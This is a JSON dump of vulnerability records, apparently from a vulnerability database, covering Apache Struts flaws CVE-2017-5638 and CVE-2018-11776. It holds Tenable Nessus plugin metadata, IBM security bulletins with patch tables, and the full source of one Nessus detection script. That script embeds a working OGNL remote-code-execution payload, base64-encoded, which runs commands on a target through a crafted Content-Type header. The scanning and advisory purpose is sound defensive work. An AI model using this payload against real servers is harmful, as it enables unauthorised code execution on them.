script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:10", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T15:36:20", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-05-31T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T17:38:55", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| 